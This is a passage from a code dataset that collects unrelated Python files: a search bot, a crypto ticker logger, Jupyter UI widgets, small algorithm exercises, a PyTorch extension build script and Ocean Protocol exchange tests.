\"\"\"\n Google.\n\n Search for the given terms on Google.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/customsearch/v1\",\n params={\n \"key\": ctx.config.api_key,\n \"cx\": ctx.config.cx,\n \"q\": term\n }\n ).json()\n\n results = r.get(\"items\", [])\n\n if not results:\n ctx.respond(ctx._(\"Couldn't find anything matching \\\"{term}\\\".\").format(term=term))\n return\n\n total = len(results)\n\n ctx.respond(ctx._(\"({num} of {total}) {title}: {url}\").format(\n title=results[0][\"title\"],\n url=results[0][\"link\"],\n num=1,\n total=total\n ))\n\n@service.command(r\"!image (?P.+?)$\")\n@service.command(r\"image(?: for)? (?P.+?)\\??$\", mention=True)\n@background\ndef image(ctx, term):\n \"\"\"\n Image search.\n\n Search for the given terms on Google.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/customsearch/v1\",\n params={\n \"key\": ctx.config.api_key,\n \"cx\": ctx.config.cx,\n \"searchType\": \"image\",\n \"q\": term\n }\n ).json()\n\n results = [\n item\n for item in r.get(\"items\", [])\n if item.get(\"link\").startswith(\"http\")\n ]\n\n if not results:\n ctx.respond(ctx._(\"Couldn't find anything matching \\\"{term}\\\".\").format(term=term))\n return\n\n total = len(results)\n\n ctx.respond(ctx._(\"({num} of {total}) {url}\").format(\n url=results[0][\"link\"],\n num=1,\n total=total\n ))\n","sub_path":"kochira/services/web/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157204126","text":"import json, requests\nimport datetime\nimport time\nfrom git import Repo\n\n# Get Load Date\nsysdate = datetime.datetime.fromtimestamp(int(time.time())).strftime('%Y-%m-%d %H:%M:%S')\n\n# All the Files\nfile_ticker = open('/home/gapp/CryptoData/ticker.csv', 'a')\n\n# Get ticker data from coin market cap\napi = 'https://api.coinmarketcap.com/v1/ticker/?limit=0'\nrow_count = 0\nresp = requests.get(url=api)\ndata = json.loads(resp.text)\nfor x in data:\n # Ticker Data\n id = x[\"id\"]\n name = x[\"name\"]\n symbol = x[\"symbol\"]\n rank = int(x[\"rank\"] or 0)\n price = float(x[\"price_usd\"] or 0)\n day_volume = float(x[\"24h_volume_usd\"] or 0)\n market_cap = float(x[\"market_cap_usd\"] or 1)\n available_supply = float(x[\"available_supply\"] or 0)\n total_supply = float(x[\"total_supply\"] or 1)\n max_supply = float(x[\"max_supply\"] or 1)\n p_change_hour = float(x[\"percent_change_1h\"] or 0.0) / 100\n p_change_day = float(x[\"percent_change_24h\"] or 0.0) / 100\n p_change_week = float(x[\"percent_change_7d\"] or 0.0) / 100\n last_updated = datetime.datetime.fromtimestamp(int(x[\"last_updated\"] or time.time())).strftime('%Y-%m-%d %H:%M:%S')\n row_ticker = [id, name, symbol, rank, price, day_volume, market_cap, available_supply, total_supply, max_supply, p_change_hour, p_change_day, p_change_week, last_updated,\n sysdate]\n file_ticker.write(','.join(str(e) for e in row_ticker) + '\\n')\n # Historical Data\nfile_ticker.close()\n# github push\nrepo_dir = '/home/gapp/CryptoData/'\nrepo = Repo(repo_dir)\nfile_list = [\n '/home/gapp/CryptoData/ticker.csv'\n]\ncommit_message = 'Update ticker file'\nrepo.index.add(file_list)\nrepo.index.commit(commit_message)\norigin = repo.remote('origin')\norigin.push()","sub_path":"ticker.py","file_name":"ticker.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260186481","text":"#!/usr/bin/env 
python3\nfrom functools import partial\nfrom markdown import markdown\nfrom datetime import datetime\nimport traitlets\nimport os\nfrom pathlib import Path\nfrom glob import glob\n\nimport ipyvuetify as v\nfrom ipywidgets import jslink\n\nfrom sepal_ui.scripts import utils\nfrom sepal_ui.scripts import messages as ms\n\n############################\n## hard coded colors ##\n############################\n\nsepal_main = '#2e7d32'\nsepal_darker = '#005005'\n\n###########################\n## classes ##\n###########################\nclass SepalWidget(v.VuetifyWidget):\n \n def __init__(self, **kwargs):\n \n super().__init__(**kwargs)\n self.viz = True\n \n def toggle_viz(self):\n \"\"\"toggle the visibility of the widget\"\"\"\n if self.viz:\n self.hide()\n else:\n self.show()\n \n return self\n \n def hide(self):\n \"\"\"add the d-none html class to the widget\"\"\"\n if not 'd-none' in str(self.class_):\n self.class_ = str(self.class_).strip() + ' d-none'\n self.viz = False\n \n return self\n \n def show(self):\n \"\"\" remove the d-none html class to the widget\"\"\"\n if 'd-none' in str(self.class_):\n self.class_ = str(self.class_).replace('d-none', '')\n self.viz = True\n \n return self\n\nclass Alert(v.Alert, SepalWidget):\n \"\"\"create an alert widget that can be used to display the process outputs\"\"\"\n \n TYPES = ('info', 'secondary', 'primary', 'error', 'warning', 'success')\n \n def __init__(self, type_=None, **kwargs):\n \n type_ = type_ if (type_ in self.TYPES) else self.TYPES[0]\n \n super().__init__(\n children = [''],\n type = type_,\n text = True,\n class_=\"mt-5\",\n **kwargs\n )\n \n self.hide()\n \n \n def add_msg(self, msg, type_='info'):\n self.show()\n self.type = type_ if (type_ in self.TYPES) else self.TYPES[0]\n self.children = [msg]\n \n return self\n \n def add_live_msg(self, msg, type_='info'):\n \n current_time = datetime.now().strftime(\"%Y/%m/%d, %H:%M:%S\")\n\n self.show()\n self.type = type_ if (type_ in self.TYPES) else self.TYPES[0]\n \n self.children = [\n v.Html(tag='p', children=['[{}]'.format(current_time)]),\n v.Html(tag='p', children=[msg])\n ]\n \n return self\n \n def reset(self):\n self.children = ['']\n self.hide()\n \n return self \n \n def bind(self, widget, obj, variable, msg=None):\n \"\"\" \n bind the variable to the widget and display it in the alert\n \n Args:\n widget (v.XX) : an ipyvuetify input element\n obj : the process_io object\n variable (str) : the name of the member in process_io object\n output_message (str, optional) : the output message before the variable display\n \"\"\"\n if not msg: msg = 'The selected variable is: '\n \n def on_change(widget, event, data, obj, variable, output, msg):\n \n setattr(obj, variable, widget.v_model)\n \n msg += str(widget.v_model)\n output.add_msg(msg)\n \n return\n \n widget.on_event('change', partial(\n on_change,\n obj=obj,\n variable=variable, \n output=self, \n msg=msg\n ))\n \n return self\n \n def check_input(self, input_, msg=None):\n \"\"\"\n Check if the input value is initialized. 
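`Alert.bind` above attaches a 'change' handler that copies the widget's `v_model` into an attribute of an IO object and echoes it in the alert; a usage sketch (the `Io` holder class and its attribute are hypothetical):

```python
import ipyvuetify as v

class Io:
    # hypothetical process-IO holder; bind() will set io.asset
    asset = None

io = Io()
alert = Alert()
field = v.TextField(label='asset', v_model=None)
alert.bind(field, io, 'asset', msg='The selected asset is: ')
# typing in `field` now updates io.asset and shows the value in `alert`
```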
If not, return False and display an error message; otherwise return True.\n \n Args:\n input_ : the input to check\n msg (str, optional): the message to display if the input is not set\n \n Returns:\n (bool): check if the value is initialized\n \"\"\"\n if not msg: msg = \"The value has not been initialized\"\n init = True \n \n if input_ == None:\n init = False\n self.add_msg(msg, 'error')\n \n return init\n \n\nclass Btn(v.Btn, SepalWidget):\n \"\"\"\n Creates a process button filled with the provided text\n \n Returns: \n btn (v.Btn) :\n \"\"\"\n \n\n def __init__(self, text='Click', icon=None, **kwargs):\n super().__init__(**kwargs)\n self.color='primary'\n self.v_icon = None\n self.children=[text]\n \n if icon:\n self.set_icon(icon)\n\n def set_icon(self, icon):\n \n if self.v_icon:\n self.v_icon.children = [icon]\n else:\n self.v_icon = v.Icon(left=True, children=[icon])\n self.children = [self.v_icon] + self.children\n \n return self\n \n def toggle_loading(self):\n \"\"\"disable and start loading or reverse\"\"\"\n self.loading = not self.loading\n self.disabled = self.loading\n \n return self\n\nclass AppBar (v.AppBar, SepalWidget):\n \"\"\"create an appBar widget with the provided title using the sepal color framework\"\"\"\n def __init__(self, title='SEPAL module', **kwargs):\n \n self.toggle_button = v.Btn(\n icon = True, \n children=[\n v.Icon(class_=\"white--text\", children=['mdi-dots-vertical'])\n ]\n )\n \n super().__init__(\n color=sepal_main,\n class_=\"white--text\",\n dense=True,\n app = True,\n children = [self.toggle_button, v.ToolbarTitle(children=[title])],\n **kwargs\n )\n \n def setTitle(self, title):\n \"\"\"set the title in the appbar\"\"\"\n \n self.children = [\n self.toggle_button, \n v.ToolbarTitle(children=[title])\n ]\n \n return self\n \nclass DrawerItem(v.ListItem, SepalWidget):\n \"\"\"create a drawer item using the user input\"\"\"\n \n def __init__(self, title, icon=None, card='', href='', **kwargs):\n \n icon = icon if icon else 'mdi-folder-outline'\n \n children = [\n v.ListItemAction(\n children=[\n v.Icon(\n class_=\"white--text\", \n children=[icon])\n ]\n ),\n v.ListItemContent(\n children=[\n v.ListItemTitle(\n class_=\"white--text\", \n children=[title]\n )\n ]\n )\n ]\n \n super().__init__(\n link=True,\n children=children,\n **kwargs) \n \n if not href == '':\n self.href=href\n self.target=\"_blank\"\n \n if not card == '':\n self._metadata = {'card_id': card }\n \n def display_tile(self, tiles):\n \"\"\"\n display the appropriate tiles when the item is clicked\n \n Args:\n tiles ([v.Layout]) : the list of all the available tiles in the app\n \"\"\"\n def on_click(widget, event, data, tiles):\n for tile in tiles:\n if widget._metadata['card_id'] == tile._metadata['mount_id']:\n tile.show()\n else:\n tile.hide()\n \n self.on_event('click', partial(on_click, tiles=tiles))\n \n return self\n \nclass NavDrawer(v.NavigationDrawer, SepalWidget):\n \"\"\" \n create a navdrawer using the different items of the user and the sepal color framework. 
The drawer can include links to the github page of the project for wiki, bugs and repository.\n \"\"\"\n \n def __init__(self, items, code=None, wiki=None, issue=None, **kwargs):\n \n code_link = []\n if code:\n item_code = DrawerItem('Source code', icon='mdi-file-code', href=code)\n code_link.append(item_code)\n if wiki:\n item_wiki = DrawerItem('Wiki', icon='mdi-book-open-page-variant', href=wiki)\n code_link.append(item_wiki)\n if issue:\n item_bug = DrawerItem('Bug report', icon='mdi-bug', href=issue)\n code_link.append(item_bug)\n \n super().__init__(\n v_model=True,\n app=True,\n color = sepal_darker,\n children = [\n v.List(dense=True, children=items),\n v.Divider(),\n v.List(dense=True, children=code_link)\n ],\n **kwargs\n )\n \n def display_drawer(self, toggleButton):\n \"\"\"\n bind the drawer to its toggleButton\n\n Args:\n drawer (v.navigationDrawer) : the drawer to be displayed\n toggleButton(v.Btn) : the button that activates the drawer\n \"\"\"\n def on_click(widget, event, data, drawer):\n drawer.v_model = not drawer.v_model\n \n toggleButton.on_event('click', partial(on_click, drawer=self))\n \n return self\n\nclass Footer(v.Footer, SepalWidget):\n \"\"\"create a footer with customizable text. Not yet capable of displaying logos\"\"\"\n def __init__(self, text=\"\", **kwargs):\n \n text = text if text != '' else 'SEPAL \\u00A9 {}'.format(datetime.today().year)\n \n super().__init__(\n color = sepal_main,\n class_ = \"white--text\",\n app=True,\n children = [text],\n **kwargs\n )\n \nclass App(v.App, SepalWidget):\n \"\"\"Create an app display with the tiles created by the user. Creates a default footer and appBar if none are provided. The navdrawer is fully optional\n \"\"\"\n \n def __init__(self, tiles=[''], appBar=None, footer=None, navDrawer=None, **kwargs):\n \n self.tiles = None if tiles == [''] else tiles\n \n app_children = []\n \n #add the navDrawer if existing\n if navDrawer:\n app_children.append(navDrawer)\n \n #create a default appBar if necessary\n if not appBar:\n appBar = AppBar()\n app_children.append(appBar)\n\n #add the content of the app\n content = v.Content(children=[\n v.Container(fluid=True,children = tiles)\n ])\n app_children.append(content)\n \n #create a default footer if necessary\n if not footer:\n footer = Footer()\n app_children.append(footer)\n \n super().__init__(\n v_model=None,\n children = app_children,\n **kwargs)\n \n def show_tile(self, name):\n \"\"\"select the tile to display using its mount-id\"\"\"\n for tile in self.tiles:\n if name == tile._metadata['mount_id']:\n tile.show()\n else:\n tile.hide()\n \n return self\n \n \nclass Tile(v.Layout, SepalWidget):\n \"\"\"create a customizable tile for the sepal UI framework\"\"\"\n \n def __init__(self, id_, title, inputs=[''], btn=None, output=None, **kwargs):\n \n if btn:\n inputs.append(btn)\n \n if output:\n inputs.append(output)\n \n title = v.Html(xs12=True, tag='h2', children=[title])\n content = [v.Flex(xs12=True, children=[widget]) for widget in inputs]\n \n card = v.Card(\n class_ = \"pa-5\",\n raised = True,\n xs12 = True,\n children = [title] + content\n )\n \n super().__init__(\n _metadata={'mount_id': id_},\n row=True,\n align_center=True,\n class_=\"ma-5 d-inline\",\n xs12=True,\n children = [card],\n **kwargs\n )\n \n def set_content(self, content):\n \n self.children[0].children = [self.children[0].children[0]] + content\n \n return self \n \n def set_title(self, title):\n \n title = v.Html(xs12=True, tag='h2', children=[title])\n \n self.children[0].children = [title] + 
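The `App`, `Tile`, and drawer classes above cooperate through the `mount_id` metadata; a minimal wiring sketch built only from classes defined in this file (titles and ids are invented):

```python
# Two tiles selected by mount_id, a drawer that toggles from the app
# bar button, and drawer items that reveal the matching tile on click.
tiles = [Tile('io_widget', 'Inputs'), Tile('result_widget', 'Results')]
app_bar = AppBar('Demo module')
items = [DrawerItem('Inputs', card='io_widget'),
         DrawerItem('Results', card='result_widget')]
for item in items:
    item.display_tile(tiles)
drawer = NavDrawer(items).display_drawer(app_bar.toggle_button)
app = App(tiles=tiles, appBar=app_bar, navDrawer=drawer)
app.show_tile('io_widget')  # start on the Inputs tile
```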
self.children[0].children[1:]\n \n return self\n \n def hide(self):\n \"\"\"hide the widget\"\"\"\n \n super().hide()\n \n if 'd-inline' in str(self.class_):\n self.class_ = self.class_.replace('d-inline','')\n \n return self\n \n def show(self):\n \"\"\" remove the d-none html class to the widget\"\"\"\n \n super().show()\n \n if not 'd-inline' in str(self.class_):\n self.class_ = str(self.class_).strip() + ' d-inline'\n \n return self\n \n def toggle_inputs(self, fields_2_show, fields):\n \"\"\"\n display only the widgets that are part of the input_list. the widget_list is the list of all the widgets of the tile.\n \n Args:\n fields_2_show ([v.widget]) : the list of input to be display\n fields ([v.widget]) : the list of the tile widget\n \"\"\"\n \n for field in fields:\n if field in fields_2_show: \n if 'd-none' in str(field.class_):\n field.class_ = field.class_.replace('d-none', '')\n else:\n if not 'd-none' in str(field.class_):\n field.class_ = str(field.class_).strip() + ' d-none'\n \n\n return self\n \nclass TileAbout(Tile):\n \"\"\"\n create a about tile using a md file. This tile will have the \"about_widget\" id and \"About\" title.\"\"\"\n \n def __init__(self, pathname, **kwargs):\n \n #read the content and transform it into a html\n f = open(pathname, 'r')\n if f.mode == 'r':\n about = f.read()\n else :\n about = '**No About File**'\n \n about = markdown(about, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n about = '
<div>\n' + about + '\n</div>
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(about).tag(sync=True)\n \n \n content = MyHTML()\n \n super().__init__('about_widget', 'About', inputs=[content], **kwargs)\n \nclass TileDisclaimer(Tile):\n \"\"\"\n create a about tile using a md file. This tile will have the \"about_widget\" id and \"About\" title.\"\"\"\n \n def __init__(self, **kwargs):\n \n pathname = os.path.join(os.path.dirname(__file__), 'scripts', 'disclaimer.md')\n \n #read the content and transform it into a html\n f = open(pathname, 'r')\n if f.mode == 'r':\n about = f.read()\n else :\n about = '**No Disclaimer File**'\n \n about = markdown(about, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n about = '
<div>\n' + about + '\n</div>
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(about).tag(sync=True)\n \n \n content = MyHTML()\n \n super().__init__('about_widget', 'Disclaimer', inputs=[content], **kwargs)\n\n \nclass DownloadBtn(v.Btn, SepalWidget):\n \"\"\"Create a green downloading button with the user text\"\"\"\n \n def __init__(self, text, path='#', **kwargs):\n \n #create the url\n if utils.is_absolute(path):\n url = path\n else: \n url = utils.create_download_link(path)\n \n super().__init__(\n class_='ma-2',\n xs5=True,\n color='success',\n href=url,\n children=[\n v.Icon(left=True, children=['mdi-download']),\n text\n ],\n **kwargs\n )\n \nclass DatePicker(v.Layout, SepalWidget):\n \n def __init__(self, label=\"Date\", **kwargs):\n \n date_picker = v.DatePicker(\n no_title=True, \n v_model=None, \n scrollable=True\n )\n\n date_text = v.TextField(\n v_model=None,\n label=label,\n hint=\"YYYY-MM-DD format\",\n persistent_hint=True, \n prepend_icon=\"event\",\n readonly=True,\n v_on='menuData.on'\n )\n\n menu = v.Menu(\n transition=\"scale-transition\",\n offset_y=True, \n v_slots=[{\n 'name': 'activator',\n 'variable': 'menuData',\n 'children': date_text,\n }], \n children=[date_picker]\n )\n\n super().__init__(\n v_model=None,\n row=True,\n class_='pa-5',\n align_center=True,\n children=[v.Flex(xs10=True, children=[menu])],\n **kwargs\n )\n\n jslink((date_picker, 'v_model'), (date_text, 'v_model'))\n jslink((date_picker, 'v_model'), (self, 'v_model'))\n \nclass FileInput(v.Layout, SepalWidget, HasTraits):\n\n \n file = Unicode('')\n \n def __init__(self, \n extentions=['.txt'], \n folder=os.path.expanduser('~'), \n label='select file', \n **kwargs):\n\n self.extentions = extentions\n self.folder = folder\n \n self.selected_file = v.TextField(\n label='file', \n v_model=self.file\n )\n \n self.file_list = v.List(\n dense=True, \n color='grey lighten-4',\n flat=True,\n children=[\n v.ListItemGroup(\n children=self.get_items(),\n v_model=''\n )\n ]\n )\n \n self.file_menu = v.Menu(\n min_width=300,\n children=[self.file_list], \n close_on_content_click=False,\n max_height='300px', \n v_slots=[{\n 'name': 'activator',\n 'variable': 'x',\n 'children': v.Btn(v_model=False, v_on='x.on', children=[label])\n }])\n \n super().__init__(\n row=True,\n class_='pa-5',\n align_center=True,\n children=[\n v.Flex(xs12=True, children=[self.selected_file]),\n v.Flex(xs12=True, children=[self.file_menu])\n ],\n **kwargs\n )\n \n link((self.selected_file, 'v_model'), (self, 'file'))\n\n def on_file_select(change):\n\n new_value = change['new']\n if new_value:\n if os.path.isdir(new_value):\n self.folder = new_value\n self.change_folder()\n \n elif os.path.isfile(new_value):\n self.file = new_value\n\n self.file_list.children[0].observe(on_file_select, 'v_model')\n \n def change_folder(self):\n \"\"\"change the target folder\"\"\"\n #reset files \n self.file_list.children[0].children = self.get_items()\n \n\n def get_items(self):\n \"\"\"return the list of items inside the folder\"\"\"\n \n list_dir = glob(os.path.join(self.folder, '*/'))\n \n for extention in self.extentions:\n list_dir.extend(glob(os.path.join(self.folder, '*' + extention)))\n \n folder_list = []\n file_list = []\n\n for el in list_dir:\n extention = Path(el).suffix\n if extention == '':\n icon = 'mdi-folder-outline'\n color = 'amber'\n elif extention in ['.csv', '.txt']:\n icon = 'mdi-border-all'\n color = 'green accent-4'\n elif extention in ['.tiff', '.tif']:\n icon = \"mdi-image-outline\"\n color = 
\"deep-purple\"\n else:\n icon = 'mdi-file-outline'\n color = 'light-blue'\n \n children = [\n v.ListItemAction(children=[v.Icon(color= color,children=[icon])]),\n v.ListItemContent(children=[v.ListItemTitle(children=[Path(el).stem + Path(el).suffix])])\n ]\n\n if os.path.isdir(el): \n folder_list.append(v.ListItem(value=el, children=children))\n else:\n file_list.append(v.ListItem(value=el, children=children))\n \n\n folder_list = sorted(folder_list, key=lambda x: x.value)\n file_list = sorted(file_list, key=lambda x: x.value)\n\n parent_path = str(Path(self.folder).parent)\n parent_item = v.ListItem(value=parent_path, children=[\n v.ListItemAction(children=[v.Icon(color='black',children=['mdi-folder-upload-outline'])]),\n v.ListItemContent(children=[v.ListItemTitle(children=[f'..{parent_path}'])])\n ])\n\n folder_list.extend(file_list)\n folder_list.insert(0,parent_item)\n\n return folder_list\n \n def get_parent_path(self):\n \"\"\"return the list of all the parents of a given path\"\"\"\n path_list = [self.folder]\n path = Path(self.folder)\n\n while str(path.parent) != path_list[-1]:\n path = path.parent\n path_list.append(str(path))\n \n return path_list\n \nclass Markdown(v.Layout, SepalWidget):\n \"\"\"create a v.layout based on the markdown text given\"\"\"\n \n def __init__(self, mkd_str=\"\", **kwargs):\n \n mkd = markdown(mkd_str, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n mkd = '
<div>\n' + mkd + '\n</div>
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(mkd).tag(sync=True)\n \n content = MyHTML()\n \n super().__init__(\n row=True,\n class_='pa-5',\n align_center=True,\n children=[v.Flex(xs12=True, children=[content])],\n **kwargs\n )","sub_path":"sepal_ui/sepalwidgets_ui.py","file_name":"sepalwidgets_ui.py","file_ext":"py","file_size_in_byte":22373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"578813976","text":"\n\nimport random\n\nclass node:\n def __init__(self, data, next = 0):\n self.data = data\n self.next = next\n\ndef genlist(n, min = 1, max = 10):\n result = []\n for i in range(n):\n c = random.randint(min, max)\n result.append(c)\n return result\n\ndef linklist(ll):\n ll = ll[::-1]\n count = len(ll)\n head = 0\n for i in range(count):\n n = node(ll[i], head)\n head = n\n return head\n\ndef printlist(head):\n n = head\n while(n != 0):\n print(n.data)\n n = n.next\n\ndef removeDuplicate(head):\n n1 = head\n while(n1 != 0):\n v = n1.data\n n2 = n1.next\n prev = n1\n while(n2 != 0):\n if (n2.data == v):\n prev.next = n2.next\n else:\n prev = n2\n n2 = prev.next\n n1 = n1.next\n\n return head\n\ndef removeDuplicateNew(head):\n n = head\n values = []\n while(n != 0):\n if (not n.data in values):\n values.append(n.data)\n prev = n\n else:\n prev.next = n.next\n\n n = n.next\n\n return head\n\n#method = removeDuplicate\nmethod = removeDuplicateNew\n\n#values = [ 2, 2, 2, 3, 5, 2, 1, 4, 5, 2 ]\nvalues = genlist(10, 1, 5)\nlinkhead = linklist(values)\nprintlist(linkhead)\nprint(\"====================\")\nnewhead = method(linkhead)\nprintlist(newhead)\n","sub_path":"Cracking_the_Coding_Interview/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464921456","text":"from collections import defaultdict\n\n\nclass Solution:\n def areSentencesSimilar(self, words1, words2, pairs):\n \"\"\"\n :type words1: List[str]\n :type words2: List[str]\n :type pairs: List[List[str]]\n :rtype: bool\n \"\"\"\n if len(words1) != len(words2):\n return False\n pairDict = defaultdict(set)\n for pair in pairs:\n pairDict[pair[0]].add(pair[1])\n pairDict[pair[1]].add(pair[0])\n for i in range(len(words1)):\n if words1[i] != words2[i] and (not words1[i] in pairDict or not words2[i] in pairDict[words1[i]]):\n return False\n return True\n","sub_path":"src/sentence-similarity.py","file_name":"sentence-similarity.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"573086103","text":"from PIL import Image\n\ndef fit(image, size, method=Image.NEAREST, centering=(0.0, 0.0)):\n if not isinstance(centering, list):\n centering = [centering[0], centering[1]]\n\n liveArea = (0, 0, image.size[0], image.size[1])\n liveSize = (liveArea[2] - liveArea[0], liveArea[3] - liveArea[1])\n liveAreaAspectRatio = float(liveSize[0])/float(liveSize[1])\n aspectRatio = float(size[0]) / float(size[1])\n\n if liveAreaAspectRatio >= aspectRatio:\n cropWidth = int((aspectRatio * float(liveSize[1])) + 0.5)\n cropHeight = liveSize[1]\n else:\n cropWidth = liveSize[0]\n cropHeight = int((float(liveSize[0])/aspectRatio) + 0.5)\n\n leftSide = int(liveArea[0] + (float(liveSize[0]-cropWidth) * centering[0]))\n topSide = int(liveArea[1] + (float(liveSize[1]-cropHeight) * centering[1]))\n \n if leftSide < 0:\n leftSide = 0\n \n if topSide 
< 0:\n topSide = 0\n\n out = image.crop((leftSide, topSide, leftSide + cropWidth, topSide + cropHeight))\n\n return out.resize(size, method)\n\ndef squaremaker(image):\n im = image\n \n w = im.size[0]\n h = im.size[1]\n \n if w 0:\n if grid[x][y - 1] == 1:\n perimeter -= 1\n if y < (width - 1):\n if grid[x][y + 1] == 1:\n perimeter -= 1\n if x > 0:\n if grid[x - 1][y] == 1:\n perimeter -= 1\n if x < (height - 1):\n if grid[x + 1][y] == 1:\n perimeter -= 1\n y += 1\n x += 1\n return (perimeter)\n","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"304436976","text":"class RedisDataParserException(Exception):\n \"\"\"\n Basic exception for data parsers\n \"\"\"\n pass\n\n\nclass ParserValueError(RedisDataParserException):\n \"\"\"\n When parser fails to convert parsed value\n from string to another type\n \"\"\"\n\n def __init__(self, msg=None):\n if msg is None:\n msg = 'Parser value error'\n else:\n msg = 'Parser value error: ' + msg\n super().__init__(msg)\n\n\nclass ParserFirstByteNotRecognized(RedisDataParserException):\n \"\"\"\n There is no ongoing parsing and first byte of the\n data does not corresponds to any type of parsing\n \"\"\"\n\n def __init__(self, msg=None):\n if msg is None:\n msg = 'First byte not recognized'\n else:\n msg = 'First byte not recognized: ' + msg\n super().__init__(msg)\n\n\nclass ParserBulkStringWrongSize(RedisDataParserException):\n \"\"\"\n Actual size of the string differs from given ('\\r\\n' is not\n found right after the string)\n \"\"\"\n def __init__(self, msg=None):\n if msg is None:\n msg = 'First byte not recognized'\n else:\n msg = 'First byte not recognized: ' + msg\n super().__init__(msg)\n\n","sub_path":"src/exceptions/redis_data_parser_exceptions.py","file_name":"redis_data_parser_exceptions.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71425409","text":"__author__ = 'Dell'\nimport requests,os\nfrom bs4 import BeautifulSoup\n\n\n\n\nurl = 'https://github.com/trending?l=python'\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.content)\n\nget_data = soup.find_all('h3',{'class':'repo-list-name'})\n\nos.chdir('/home/ubuntu/pcr/get_git')\nfor link in get_data:\n a_link = link.find_all('a')\n comad = 'git clone'\n for href_link in a_link:\n git_repo_name = href_link.get('href')\n git_repo_url = 'https://github.com' + git_repo_name\n comad = comad + '\\t' + git_repo_url\n os.system(comad)\n\n\n\n","sub_path":"get_git_github.py","file_name":"get_git_github.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"416442874","text":"# build.py\nimport os\nimport platform\nimport sys\nfrom setuptools import setup, find_packages\nimport torch\nfrom torch.utils.ffi import create_extension\n\nextra_compile_args = ['-std=c++11', '-fPIC']\nwarp_rnnt_path = \"../build\"\n\nif torch.cuda.is_available() or \"CUDA_HOME\" in os.environ:\n enable_gpu = True\nelse:\n print(\"Torch was not built with CUDA support, not building warp-ctc GPU extensions.\")\n enable_gpu = False\n\nif platform.system() == 'Darwin':\n lib_ext = \".dylib\"\nelse:\n lib_ext = \".so\"\n\nheaders = ['src/cpu_binding.h']\n\nif enable_gpu:\n extra_compile_args += ['-DWARPRNNT_ENABLE_GPU']\n headers += 
['src/gpu_binding.h']\n\nif \"WARP_RNNT_PATH\" in os.environ:\n warp_rnnt_path = os.environ[\"WARP_RNNT_PATH\"]\nif not os.path.exists(os.path.join(warp_rnnt_path, \"libwarprnnt\" + lib_ext)):\n print((\"Could not find libwarprnnt.so in {}.\\n\"\n \"Build warp-rnnt and set WARP_RNNT_PATH to the location of\"\n \" libwarprnnt.so (default is '../build')\").format(warp_rnnt_path))\n sys.exit(1)\ninclude_dirs = [os.path.realpath('../include')]\n\nffi = create_extension(\n name='warprnnt_pytorch._warp_rnnt',\n package=True,\n language='c++',\n headers=headers,\n sources=['src/binding.cpp'],\n with_cuda=enable_gpu,\n include_dirs=include_dirs,\n library_dirs=[os.path.realpath(warp_rnnt_path)],\n libraries=['warprnnt'],\n extra_link_args=['-Wl,-rpath,' + os.path.realpath(warp_rnnt_path)],\n extra_compile_args=extra_compile_args)\nffi = ffi.distutils_extension()\nsetup(\n name=\"warprnnt_pytorch\",\n version=\"0.1\",\n description=\"PyTorch wrapper for RNN-Transducer\",\n url=\"https://github.com/HawkAaron/warp-rnnt\",\n author=\"Mingkun Huang\",\n author_email=\"mingkunhuang95@gmail.com\",\n license=\"Apache\",\n packages=find_packages(),\n ext_modules=[ffi],\n)\n","sub_path":"pytorch_binding/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391627594","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport pytest\nfrom ocean_lib.models.fixed_rate_exchange import FixedRateExchange\nfrom ocean_lib.ocean.ocean_exchange import OceanExchange\n\nfrom ocean_lib.ocean.util import get_contracts_addresses\nfrom ocean_lib.web3_internal.currency import pretty_ether_and_wei, to_wei\nfrom tests.resources.helper_functions import get_consumer_wallet, get_publisher_wallet\n\n_NETWORK = \"ganache\"\n\n\ndef _get_exchange_address(config):\n \"\"\"Helper function to retrieve a known exchange address.\"\"\"\n return get_contracts_addresses(config.address_file, _NETWORK)[\n FixedRateExchange.CONTRACT_NAME\n ]\n\n\ndef test_search_exchange_by_data_token(publisher_ocean_instance):\n \"\"\"Tests searching exchanges which have matching data token address.\"\"\"\n ocn = publisher_ocean_instance\n alice_wallet = get_publisher_wallet()\n bob_wallet = get_consumer_wallet()\n dt = ocn.create_data_token(\n \"DataToken1\", \"DT1\", alice_wallet, blob=ocn.config.metadata_cache_uri\n )\n dt.mint(bob_wallet.address, to_wei(100), alice_wallet)\n dt.approve(ocn.exchange._exchange_address, to_wei(100), alice_wallet)\n\n exchange_id1 = ocn.exchange.create(dt.address, to_wei(\"0.1\"), alice_wallet)\n\n exchange_id2 = ocn.exchange.create(dt.address, to_wei(\"0.1\"), 